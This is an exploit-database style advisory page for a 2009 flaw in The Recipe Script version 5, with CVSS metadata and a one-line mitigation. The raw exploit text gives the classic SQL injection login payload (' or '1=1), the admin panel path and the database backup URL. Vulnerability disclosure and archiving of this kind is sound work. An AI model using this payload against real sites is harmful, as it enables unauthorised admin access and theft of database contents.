The Recipe Script version 5 (Auth Bypass) Remote Sql Injecion/ Database Backup Exploit

vendor:

The Recipe Script

by:

TiGeR-Dz

9,3

CVSS

HIGH

Remote Sql Injection/ Database Backup Exploit

CWE

Product Name: The Recipe Script

Affected Version From: The Recipe Script version 5

Affected Version To: The Recipe Script version 5

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The Recipe Script version 5 (Auth Bypass) Remote Sql Injecion/ Database Backup Exploit

A vulnerability in The Recipe Script version 5 allows an attacker to bypass authentication and gain access to the administration panel. An attacker can then access the database backup page and download the database backup file.

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

-----------------------------------------------------
The Recipe Script version 5 (Auth Bypass) Remote Sql Injecion/ Database Backup Exploit
-----------------------------------------------------
Founder: TiGeR-Dz
script:The Recipe Script version 5
downlaod:http://recipescript.com/
-----------------------------------------------------------
-----------------------------------------------------------
(Auth Bypass) Remote Sql Injecion
--------------------------------
username:  ' or '1=1
Password:  ' or '1=1

demo:
-----
http://recipescript.com/demo/admin/index.php
------------------------------------------------------
Database Backup Exploit:
-------------------------
After login to administration panel to get Backup

http://recipescript.com/demo/admin/db_backup.php

--------------------------------------------------------

# milw0rm.com [2009-05-08]